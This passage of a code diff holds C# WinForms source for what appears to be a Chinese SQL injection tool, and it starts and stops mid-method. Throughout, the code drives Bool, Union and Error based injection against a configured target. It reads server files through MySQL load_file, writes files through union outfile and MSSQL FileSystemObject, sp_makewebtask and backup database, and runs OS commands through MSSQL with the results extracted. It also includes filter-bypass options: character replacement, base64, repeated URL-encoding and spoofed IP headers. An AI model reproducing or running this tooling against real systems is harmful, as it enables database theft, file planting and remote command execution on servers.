+ this.config = XML.readConfig(ofd.FileName);
+ reloadConfig(this.config);
+ MessageBox.Show("加载配置成功!");
+ }
+ }
+
+ public void reloadConfig(Config config)
+ {
+
+ this.txt_basic_host.Text = config.domain;
+ this.txt_basic_port.Text = config.port + "";
+ this.cbox_basic_timeOut.Text = config.timeOut + "";
+ this.cbox_basic_encoding.Text = config.encoding;
+
+ switch (config.injectType)
+ {
+
+ case InjectType.UnKnow:
+ this.cbox_basic_injectType.SelectedIndex = 0;
+ break;
+ case InjectType.Bool:
+ this.cbox_basic_injectType.SelectedIndex = 1;
+ break;
+ case InjectType.Error:
+ this.cbox_basic_injectType.SelectedIndex = 2;
+ break;
+ case InjectType.Union:
+ this.cbox_basic_injectType.SelectedIndex = 3;
+ break;
+
+ }
+ switch (config.dbType)
+ {
+
+ case DBType.UnKnow:
+ this.cbox_basic_dbType.SelectedIndex = 0;
+ break;
+ case DBType.Access:
+ this.cbox_basic_dbType.SelectedIndex = 1;
+ break;
+ case DBType.MySQL5:
+ this.cbox_basic_dbType.SelectedIndex = 2;
+ break;
+ case DBType.SQLServer:
+ this.cbox_basic_dbType.SelectedIndex = 3;
+ break;
+ case DBType.Oracle:
+ this.cbox_basic_dbType.SelectedIndex = 4;
+ break;
+ case DBType.MySQL4:
+ this.cbox_basic_dbType.SelectedIndex = 5;
+ break;
+ }
+ this.data_dbs_cob_db_encoding.Text = config.db_encoding;
+ this.cbox_basic_threadSize.Text = config.threadSize + "";
+ this.cbox_basic_reTryCount.Text = config.reTry + "";
+ this.txt_inject_key.Text = config.key;
+ this.chk_inject_foward_302.Checked = config.is_foward_302;
+
this.chk_inject_reverseKey.Checked = config.reverseKey;
+
+ switch (config.keyType)
+ {
+
+ case KeyType.Key:
+ this.cbox_inject_type.SelectedIndex = 0;
+ break;
+ case KeyType.Code:
+ this.cbox_inject_type.SelectedIndex = 1;
+ break;
+ case KeyType.Length:
+ this.cbox_inject_type.SelectedIndex = 2;
+ break;
+ case KeyType.Time:
+ this.cbox_inject_type.SelectedIndex = 3;
+ config.maxTime = Tools.convertToInt(config.key);
+ break;
+ }
+
+ this.chk_openURLEncoding.Checked = config.isOpenURLEncoding;
+ this.chk_useSSL.Checked = config.useSSL;
+ this.txt_inject_unionColumnsCount.Text = config.columnsCount + "";
+ this.txt_inject_showColumn.Text = config.showColumn + "";
+
+ this.txt_inject_request.Text = config.request;
+ //file
+
+ this.cbox_file_readFileEncoding.Text = config.readFileEncoding;
+
+ //cmd
+ this.cmd_chk_showCmdResult.Checked = config.showCmdResult;
+ //bypass
+ this.bypass_chk_inculdeStr.Checked = config.inculdeStr;
+ this.cob_keyRepalce.SelectedIndex = config.keyReplace;
+ this.bypass_chk_base64.Checked = config.base64;
+ this.cbox_base64Count.SelectedIndex = config.base64Count-1;
+ this.cbox_bypass_urlencode_count.SelectedIndex = config.urlencodeCount - 1;
+
+ //替换字符
+ this.chk_reaplaceBeforURLEncode.Checked = config.reaplaceBeforURLEncode;
+ String[] replaceStrs = Regex.Split(config.replaceStrs, "\\n");
+ config.replaceStrs = config.replaceStrs.Replace("\t\n","");
+ if (replaceStrs.Length > 0)
+ {
+
+ foreach (String line in replaceStrs)
+ {
+ String[] strs = Regex.Split(line, "\\t");
+ if (strs.Length == 2)
+ {
+ if (!String.IsNullOrEmpty(strs[0])&& !this.replaceList.Contains(strs[0])) {
+ this.replaceList.Add(strs[0], strs[1]);
+ ListViewItem lvi = new ListViewItem(strs[0]);
+ lvi.SubItems.Add(strs[1]);
+ lvi.Name = strs[1];
+ this.bypass_lvw_replaceString.Items.Add(lvi);
+ }
+ }
+ }
+
+ }
+
+ this.bypass_cbox_sendHTTPSleepTime.Text = config.sendHTTPSleepTime + "";
+ this.bypass_cbox_randIPToHeader.Text = config.randIPToHeader;
+
+
+
+
+
+ }
+
+
public FindString fs = null;
+ public void showFindString(object sender, KeyEventArgs e, TextBox textBox)
+ {
+ if (e.Control && e.KeyCode == Keys.F)
+ {
+ if (fs == null)
+ {
+
+ fs = new FindString();
+
+ }
+ fs.txtbox = textBox;
+ fs.ShowDialog();
+ }
+ }
+
+
+ private void log_txt_response_KeyDown(object sender, KeyEventArgs e)
+ {
+ showFindString(sender, e, this.log_txt_response);
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void txt_inject_request_KeyDown(object sender, KeyEventArgs e)
+ {
+ showFindString(sender, e, this.txt_inject_request);
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void data_dbs_lvw_tsmi_copyLineData_Click(object sender, EventArgs e)
+ {
+ if (this.data_dbs_lvw_data.SelectedItems.Count > 0)
+ {
+ ListViewItem lvi = this.data_dbs_lvw_data.SelectedItems[0];
+ StringBuilder str = new StringBuilder();
+ foreach (ListViewItem.ListViewSubItem clvi in lvi.SubItems)
+ {
+ str.Append(clvi.Text + "----");
+ }
+ if (str.Length > 0)
+ {
+ //清空剪切板内容
+ Clipboard.Clear();
+ //复制内容到剪切板
+ Clipboard.SetData(DataFormats.Text, str.Remove(str.Length - 4, 4));
+ MessageBox.Show("复制成功!");
+ }
+
+ }
+ }
+
+ private void tsmi_saveConfig_Click(object sender, EventArgs e)
+ {
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "XML文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ XML.saveConfig(saveFileDialog.FileName, config);
+ }
+
+ MessageBox.Show("导出成功!");
+ }
+
+ private void tsmi_update_Click(object sender, EventArgs e)
+ {
+ new Thread(checkUpdate).Start();
+ }
+
+ private void timer_status_Tick(object sender, EventArgs e)
+ {
+ this.runTime++;
+ this.status_lbl_time.Text = this.runTime + "s";
+ this.status_lbl_threadStatus.Text = MyThreadPool.getCurrentThreadCount() + "/" + this.cbox_basic_threadSize.Text;
+
+ getDBStatus();
+ this.status_lbl_dbsCount.Text =
this.currentDbsCount + "/" + this.dbsCount;
+ this.status_lbl_tableCount.Text = this.currentTableCount + "/" + this.tableCount;
+ if (this.currentDataCount == 0)
+ {
+ this.currentDataCount = this.data_dbs_lvw_data.Items.Count;
+ }
+ this.status_lbl_dataCount.Text = this.currentDataCount + "/" + this.dataCount;
+ if (MyThreadPool.getCurrentThreadCount() <= 0)
+ {
+ this.status_lbl_runStatus.Text = "未开始";
+ }
+ else
+ {
+
+ this.status_lbl_runStatus.Text = "正在运行";
+ }
+ this.status_lbl_all_status.Text = comm_currentCount + "/" + comm_count;
+ this.lbl_packsCount.Text = HTTP.index.ToString();
+
+ }
+
+ public void getDBStatus()
+ {
+
+ this.currentDbsCount = 0;
+ this.currentTableCount = 0;
+ foreach (TreeNode tn in this.data_tvw_dbs.Nodes)
+ {
+
+ if ("dbs".Equals(tn.Tag))
+ {
+
+ this.currentDbsCount++;
+ foreach (TreeNode ctn in tn.Nodes)
+ {
+
+ if ("table".Equals(ctn.Tag))
+ {
+
+ this.currentTableCount++;
+ }
+ }
+ }
+ }
+ }
+ String[] ver_tmp = null;
+ public void file_txt_resultSetText(String text)
+ {
+ this.file_txt_result.Text = text;
+ }
+
+ public void cmd_txt_resultSetText(String text)
+ {
+ this.cmd_txt_result.Text = text;
+ }
+
+ public void readOrWriteFile()
+ {
+ String path = this.file_txt_filePath.Text;
+ String path_16 = Tools.strToHex(path, "UTF-8");
+ String data_payload = "";
+ if (Thread.CurrentThread.Name == null)
+ {
+ Thread.CurrentThread.Name = "FileThread-";
+ }
+ if (this.file_cbox_readWrite.SelectedIndex == 0)
+ {
+ data_payload = MySQL5.hex.Replace("{data}", "load_file(" + path_16 + ")");
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ try
+ {
+ if (String.IsNullOrEmpty(config.key))
+ {
+ MessageBox.Show("大侠,请在注入中心,配置Bool盲注的关键字!");
+ return;
+ }
+ String payload_len = MySQL5.ver_length.Replace("{data}", data_payload);
+ int len = getValueByStepUp(payload_len, 0, 50000);
+ this.dataCount = len;
+ String value = "";
+ ver_tmp = new String[len];
+ //获取值
+ for (int i = 0; i < len; i++)
+ {
+ MyThreadPool.initThread(new
ParameterizedThreadStart(readOrWriteFileByMySQLByHexAscii), data_payload + "#" + i);
+ this.currentDataCount = i;
+ }
+ while (status == 1)
+ {
+
+ Thread.Sleep(50);
+ if (MyThreadPool.getCurrentThreadCount() == 0)
+ {
+
+ if (ver_tmp != null)
+ {
+ value = Tools.unHex(Tools.convertToString(ver_tmp), config.readFileEncoding);
+ break;
+ }
+
+ }
+
+ }
+ this.Invoke(new StringDelegate(file_txt_resultSetText), value);
+ this.Invoke(new StringDelegate(log), this.file_cbox_readWrite.Text + "完成!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Union:
+ try
+ {
+ if (config.columnsCount <= 0)
+ {
+ MessageBox.Show("大侠,请在注入中心,配置Union注入的列数!");
+ return;
+ }
+
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", MySQL5.creatMySQLReadFileByUnion(config.columnsCount, config.showColumn, "convert(load_file(" + path_16 + ") using UTF8)")));
+ this.dataCount = result.Length;
+ this.currentDataCount = result.Length;
+ this.Invoke(new StringDelegate(file_txt_resultSetText), result);
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到文件数据!");
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Error:
+ try
+ {
+ String payload_len = MySQL5.char_length.Replace("{data}", data_payload);
+ String payload_len_error = MySQL5.error_value.Replace("{data}", MySQL5.creatMySQLColumnStr(payload_len));
+
+ String result_length = getOneDataByUnionOrError(payload_len_error);
+
+
+ int sumlen = Tools.convertToInt(result_length);
+ this.dataCount = sumlen;
+ String result = "";
+
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 64 - 6;
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_tmp = MySQL5.creatMySQLColumnStr(MySQL5.substr_value.Replace("{data}", data_payload).Replace("{start}", start.ToString()).Replace("{len}",
count.ToString()));
+ String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_tmp);
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ this.currentDataCount = result.Length;
+ this.Invoke(new StringDelegate(file_txt_resultSetText), Tools.unHex(result, config.readFileEncoding));
+ }
+ //查找格式^^^col$$$col^^^
+ result = Tools.unHex(result, config.readFileEncoding);
+ Match m = Regex.Match(result, "(?<=(\\^\\^\\!))[.\\s\\S]*?(?=(\\!\\^\\^))");
+ if (m.Success)
+ {
+ result = m.Value;
+ }
+ this.Invoke(new StringDelegate(file_txt_resultSetText), result);
+ this.Invoke(new StringDelegate(log), "获取文件内容!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+
+ }
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 1)
+ {
+ //union方式写文件
+ if (config.injectType.Equals(InjectType.Union))
+ {
+ if (!String.IsNullOrEmpty(this.file_txt_result.Text))
+ {
+ String payload = MySQL5.creatMySQLWriteFileByUnion(config.columnsCount, config.showColumn, path, this.file_txt_result.Text);
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else
+ {
+ MessageBox.Show("请在下面输入您要写入文件的内容,请注意,GET方式的注入提交数据不能超过1024个字节!");
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("大侠此种方式写文件,只支持Union注入!");
+ }
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 2)
+ {
+ //filesystemobject写文件
+ String payload = MSSQL.witeFileByFileSystemObject.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 3)
+ {
+ //sp_makewebtask写文件
+ String payload = MSSQL.witeFileBySP_MakeWebTask.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 4)
+ {
+ //backup database写文件
+ String payload = MSSQL.witeFileByBackDataBase.Replace("{path}", Tools.strToHex(path, "GB2312")).Replace("{data}", Tools.strToHex(this.file_txt_result.Text, "GB2312"));
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ MessageBox.Show("大侠,写文件操作小的我已经完成了额,剩下的就请大侠人工检查写文件是否成功!");
+ }
+ else if (this.file_cbox_readWrite.SelectedIndex == 5)
+ {
+ //filesystemobject读文件
+ String payload = MSSQL.readFileByFileSystemobject.Replace("{path}", path);
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+
+ //取每一列的值
+ data_payload = MSSQL.file_content;
+ String payload_len = MSSQL.bool_dataLength.Replace("{data}", data_payload);
+ int len = getValue(payload_len, 0, 1024 * 100);
+ ver_tmp = new String[len];
+ this.dataCount = len;
+ this.Invoke(new StringDelegate(log), "SQLServer读到文件内容,长度为" + len + "字节!");
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ MyThreadPool.initThread(new ParameterizedThreadStart(getFileContentBySQLServer), i);
+ this.currentDataCount = i;
+ }
+ while (status == 1)
+ {
+ if (MyThreadPool.getCurrentThreadCount() <= 0)
+ {
+ this.Invoke(new
StringDelegate(file_txt_resultSetText), Tools.StringArrayToString(ver_tmp));
+ this.Invoke(new StringDelegate(log), "获取SQLServer读到文件内容完成!");
+ break;
+ }
+ Thread.Sleep(50);
+ }
+ break;
+
+ case InjectType.Union:
+
+ String unionresult = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.file_content));
+ this.Invoke(new StringDelegate(file_txt_resultSetText), unionresult);
+ this.Invoke(new StringDelegate(log), "获取到SQLServer读取的文件内容,长度为" + unionresult.Length + "字节!");
+ break;
+ case InjectType.Error:
+
+ String errorresult = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.file_content));
+ this.Invoke(new StringDelegate(file_txt_resultSetText), errorresult);
+ this.Invoke(new StringDelegate(log), "获取到SQLServer读取的文件内容,长度为" + errorresult.Length + "字节!");
+ break;
+ case InjectType.Sleep:
+ getDatasByUnion(config.dbType, null, 1, 1);
+ break;
+ }
+ }
+ this.file_btn_start.Text = "开始";
+ status = 0;
+
+ }
+
+ public void getFileContentBySQLServer(Object index)
+ {
+ try
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", index + "").Replace("{data}", MSSQL.file_content);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+
+ String value = "";
+
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+ int rstr = int.Parse(unicodes.ToString());
+ if (rstr <= 255)
+ {
+ value += (char)rstr;
+ }
+ else
+
{
+ value += Tools.unHexByUnicode(rstr, config.readFileEncoding);
+ }
+ ver_tmp[int.Parse(index.ToString()) - 1] = value;
+ this.Invoke(new StringDelegate(file_txt_resultSetText), Tools.StringArrayToString(ver_tmp));
+ }
+ catch (Exception e)
+ {
+
+ Tools.SysLog("获取SQLServer读到的文件内容发生错误!" + e.Message);
+ }
+ }
+
+ public void readOrWriteFileByMySQLByHexAscii(Object param)
+ {
+ String[] ps = param.ToString().Split('#');
+ int index = int.Parse(ps[1].ToString());
+ String tmp_va_payload = MySQL5.ver_value.Replace("{data}", ps[0]).Replace("{index}", (index + 1) + "");
+ //数字加大写字母的ascii码
+ int ascii = getValue(tmp_va_payload, 48, 90);
+ ver_tmp[index] = ((char)ascii).ToString();
+ String value = Tools.unHex(Tools.convertToString(ver_tmp), "GB2312");
+ this.Invoke(new StringDelegate(file_txt_resultSetText), value);
+
+ }
+
+ public void execCMDBySQLServerByUnicode(Object param)
+ {
+
+ String[] ps = param.ToString().Split('#');
+ int index = int.Parse(ps[1]);
+
+ int len = getValue(MSSQL.bool_length.Replace("{data}", ps[0]), 0, 8);
+
+ int cindex = 1;
+ String temUnicode = "";
+ while (cindex <= len)
+ {
+ String tmp_payload = MSSQL.bool_value.Replace("{data}", "convert(int," + MSSQL.substr.Replace("{data}", ps[0]).Replace("{index}", cindex + "") + ")");
+ //数字加大写字母的ascii码
+ int ascii = getValue(tmp_payload, 0, 9);
+ temUnicode += ascii.ToString();
+ cindex++;
+ }
+ int unicode = Tools.convertToInt(temUnicode);
+
+ ver_tmp[index - 1] = Tools.unHexByUnicode(unicode, "UTF-8");
+ this.Invoke(new StringDelegate(log), "获取到CMD执行结果--" + ver_tmp[index - 1]);
+ }
+
+ public void execCMDBySQLServer()
+ {
+ try
+ {
+ if (Thread.CurrentThread.Name == null)
+ {
+ Thread.CurrentThread.Name = "CmdThread-";
+ }
+
+ String cmd = this.cmd_txt_cmd.Text;
+ String cmd_16 = Tools.strToHex(cmd, "GB2312");
+ //执行cmd
+ String cmd_data_payload = MSSQL.createTable.Replace("{cmd}", cmd_16);
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cmd_data_payload,
config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ this.Invoke(new StringDelegate(log), "报告大侠,CMD命令执行完成,正在等待获取执行结果!");
+ if (config.showCmdResult)
+ {
+ switch (config.injectType)
+ {
+
+ case InjectType.Bool:
+ try
+ {
+ if (String.IsNullOrEmpty(config.key))
+ {
+
+ MessageBox.Show("大侠,请在注入中心,配置Bool盲注的关键字!");
+ return;
+ }
+ String count_payload = MSSQL.bool_value.Replace("{data}", MSSQL.cmdDataCount);
+ int count = getValueByStepUp(count_payload, 0, 50);
+ for (int i = 1; i <= count; i++)
+ {
+ String data_payload = MSSQL.cmdData.Replace("{index}", i + "");
+ String payload_len = MSSQL.bool_length.Replace("{data}", data_payload);
+ int len = getValueByStepUp(payload_len, 0, 100);
+ this.dataCount = len;
+ ver_tmp = new String[len];
+ //获取值
+ for (int j = 1; j <= len; j++)
+ {
+ String dtmp_payload = MSSQL.unicode_value.Replace("{data}", data_payload).Replace("{index}", j + "");
+ MyThreadPool.initThread(new ParameterizedThreadStart(execCMDBySQLServerByUnicode), dtmp_payload + "#" + j);
+ this.currentDataCount = j;
+ }
+ while (status == 1)
+ {
+
+ Thread.Sleep(50);
+ if (MyThreadPool.getCurrentThreadCount() == 0)
+ {
+ if (ver_tmp != null)
+ {
+ break;
+ }
+ }
+ }
+ this.dataCount = len;
+ this.cmd_txt_result.AppendText(HttpUtility.HtmlDecode(Tools.StringArrayToString(ver_tmp)) + "\r\n");
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到执行CMD命令第" + i + "行数据!");
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,获取CMD执行结果完成!");
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Union:
+ try
+ {
+ //检查配置
+ if (config.columnsCount <= 0)
+ {
+
+ MessageBox.Show("大侠,请在注入中心,配置Union注入的列数!");
+ return;
+ }
+
+ String data_count = getOneDataByUnionOrError(MSSQL.getUnionDataValueByCMD(config.columnsCount, config.showColumn, MSSQL.cmdDataCount));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,CMD执行后CMD表有" + Tools.convertToInt(data_count) + "行数据,请稍候,正在获取...");
+
+ int count = Tools.convertToInt(data_count);
+ this.dataCount = count;
+ //下标从1开始
+ for (int i = 1; i <= count; i++)
+ {
+ String payload = MSSQL.cmdData.Replace("{index}", i.ToString());
+ String result = getOneDataByUnionOrError(MSSQL.getUnionDataValueByCMD(config.columnsCount, config.showColumn, payload));
+ this.cmd_txt_result.AppendText(HttpUtility.HtmlDecode(result) + "\r\n");
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到执行CMD命令第" + i + "行数据!");
+ this.currentDataCount = i;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,获取CMD执行结果完成!");
+
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ case InjectType.Error:
+ try
+ {
+
+ String payload_len = MSSQL.bool_length.Replace("{data}", MSSQL.cmdData);
+ String data_count = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.cmdDataCount));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取CMD命令执行结果!");
+ int count = Tools.convertToInt(data_count);
+ this.dataCount = count;
+ //下标从1开始
+ for (int i = 1; i <= count; i++)
+ {
+ String payload = MSSQL.cmdData.Replace("{index}", i.ToString());
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", payload));
+ this.cmd_txt_result.AppendText(HttpUtility.HtmlDecode(result) + "\r\n");
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到执行CMD命令第" + i + "行数据!");
+ this.currentDataCount = i;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,获取CMD执行结果完成!");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ break;
+ }
+ }
+ //删除表
+ HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, MSSQL.dropTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ this.Invoke(new StringDelegate(log), "清除执行命令时创建的临时表完成!");
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "执行命令获取结果发生异常:" + e.Message);
+ }
+ this.cmd_btn_start.Text = "开始";
+ status
= 0;
+ }
+
+
+ private void file_btn_start_Click(object sender, EventArgs e)
+ {
+ if (status == 0)
+ {
+ if (config.dbType.Equals(DBType.MySQL5) || config.dbType.Equals(DBType.SQLServer))
+ {
+ if (String.IsNullOrEmpty(this.file_txt_filePath.Text))
+ {
+
+ MessageBox.Show("请填写读写文件的磁盘路径!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+ MessageBox.Show("请稍候还有后台线程正在运行!");
+ return;
+ }
+ if (!checkConfig())
+ {
+ return;
+ }
+ if (!isSetInjectPoint())
+ {
+ return;
+ }
+ status = 1;
+ this.file_btn_start.Text = "停止";
+ this.currentThread = new Thread(readOrWriteFile);
+ this.currentThread.Start();
+ }
+ else
+ {
+ MessageBox.Show("抱歉,文件读写目前只支持MySQL和SQLServer,并且账户拥有文件读写权限!");
+ }
+ }
+ else
+ {
+
+ StopThread();
+ this.file_btn_start.Text = "开始";
+ }
+
+ }
+
+ private void cmd_btn_start_Click(object sender, EventArgs e)
+ {
+ if (status == 0)
+ {
+ if (config.dbType.Equals(DBType.SQLServer))
+ {
+ if (String.IsNullOrEmpty(this.cmd_txt_cmd.Text))
+ {
+
+ MessageBox.Show("请输入执行的命令!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+ MessageBox.Show("请稍候还有后台线程正在运行!");
+ return;
+ }
+
+ status = 1;
+ this.cmd_btn_start.Text = "结束";
+ this.cmd_txt_result.Clear();
+ this.currentThread = new Thread(execCMDBySQLServer);
+ this.currentThread.Start();
+ }
+ else
+ {
+ MessageBox.Show("抱歉,此功能目前只支持SQLServer数据库,并且账户拥有dba权限!");
+ }
+ }
+ else
+ {
+ StopThread();
+ this.cmd_btn_start.Text = "开始";
+ }
+ }
+
+ private void cmd_chk_showCmdResult_CheckedChanged(object sender, EventArgs e)
+ {
+ config.showCmdResult = this.cmd_chk_showCmdResult.Checked;
+ }
+
+ private void file_txt_result_TextChanged(object sender, EventArgs e)
+ {
+ this.file_txt_result.SelectionStart = this.file_txt_result.Text.Length;
+ this.file_txt_result.SelectionLength = 0;
+ this.file_txt_result.ScrollToCaret();
+ }
+
+ private void cmd_txt_result_TextChanged(object sender, EventArgs e)
+ {
+ this.file_txt_result.SelectionStart = this.file_txt_result.Text.Length;
+
this.file_txt_result.SelectionLength = 0;
+ this.file_txt_result.ScrollToCaret();
+ }
+
+ private void bypass_btn_addReplaceStr_Click(object sender, EventArgs e)
+ {
+ if (String.IsNullOrEmpty(this.bypass_txt_replace.Text))
+ {
+
+ MessageBox.Show("大侠,请输入需要替换的字符!");
+ return;
+ }
+
+ if (this.bypass_txt_replace.Text.Equals(this.bypass_txt_replaceTo.Text))
+ {
+
+ MessageBox.Show("大侠,两个字符一样的,还需要替换什么,你这是在忽悠我吗!");
+ return;
+ }
+
+ if (!replaceList.ContainsKey(this.bypass_txt_replace.Text))
+ {
+ ListViewItem lvi = new ListViewItem(this.bypass_txt_replace.Text);
+ lvi.SubItems.Add(this.bypass_txt_replaceTo.Text);
+ lvi.Name = this.bypass_txt_replaceTo.Text;
+ this.bypass_lvw_replaceString.Items.Add(lvi);
+
+ replaceList.Add(this.bypass_txt_replace.Text, this.bypass_txt_replaceTo.Text);
+ config.replaceStrs += (this.bypass_txt_replace.Text + "\t" + this.bypass_txt_replaceTo.Text + "\n");
+ }
+ else
+ {
+ MessageBox.Show("大侠,替换字符" + this.bypass_txt_replace.Text + "已经在列表了!");
+ }
+
+
+
+
+ }
+
+ private void bypass_chk_inculdeStr_CheckedChanged(object sender, EventArgs e)
+ {
+ config.inculdeStr = this.bypass_chk_inculdeStr.Checked;
+ }
+
+ private void bypass_delselect_Click(object sender, EventArgs e)
+ {
+ if (this.bypass_lvw_replaceString.SelectedItems != null && this.bypass_lvw_replaceString.SelectedItems.Count > 0)
+ {
+ foreach (ListViewItem lvi in this.bypass_lvw_replaceString.SelectedItems)
+ {
+
+ this.bypass_lvw_replaceString.Items.Remove(lvi);
+ String delStr = lvi.SubItems[0].Text + "\t" + lvi.SubItems[1].Text + "\n";
+ config.replaceStrs = config.replaceStrs.Replace(delStr, "");
+ replaceList.Remove(lvi.SubItems[0].Text);
+
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有选择!");
+ }
+ }
+
+ private void file_cbox_readWrite_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ try
+ {
+ if ("加载获取IIS虚拟网站信息VBS".Equals(this.file_cbox_readWrite.Text))
+ {
+
+ //加载vbs脚本
+ this.file_txt_filePath.Text = "c:/test.vbs";
+ this.file_txt_result.Text =
FileTool.readFileToString("config/GetIISWebInfo.vbs");
+ MessageBox.Show("加载成功,大侠,请选择对应的写文件方法写入VBS!");
+ }
+ }
+ catch (Exception ee)
+ {
+ Tools.SysLog("读取config/GetIISWebInfo.vbs发生错误!异常信息:" + ee.Message);
+ MessageBox.Show("加载config/GetIISWebInfo.vbs发生错误!");
+ }
+ }
+ //验证key是否正确
+ private void injectConfig_btn_checkKey_Click(object sender, EventArgs e)
+ {
+ Thread t = new Thread(checkTheKey);
+ this.injectConfig_btn_checkKey.Enabled = false;
+ t.Start();
+ }
+
+ public void checkTheKey()
+ {
+
+ if (checkConfig())
+ {
+ if (isSetInjectPoint())
+ {
+
+ bool truep = findKeyInBody(Comm.truePayload);
+ bool falsep = findKeyInBody(Comm.falsePayload);
+ if (truep == true && falsep == false)
+ {
+ MessageBox.Show("关键字设置正确!");
+ }
+ else
+ {
+
+ MessageBox.Show("此关键字设置错误,无法通过此关键字获取数据!请查看HTTP发包记录是否存在乱码,检查编码设置是否正确;可能此关键字同时在真假条件上出现,请更换关键字!");
+ }
+ }
+ }
+ this.injectConfig_btn_checkKey.Enabled = true;
+ }
+
+ private void bypass_cbox_sendHTTPSleepTime_TextChanged(object sender, EventArgs e)
+ {
+ config.sendHTTPSleepTime = Tools.convertToInt(this.bypass_cbox_sendHTTPSleepTime.Text);
+ }
+
+ private void bypass_cbox_randIPToHeader_TextChanged(object sender, EventArgs e)
+ {
+ config.randIPToHeader = this.bypass_cbox_randIPToHeader.Text;
+ }
+
+ private void encode_cbox_encode_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ try
+ {
+ String encode = this.encode_txt_input.Text;
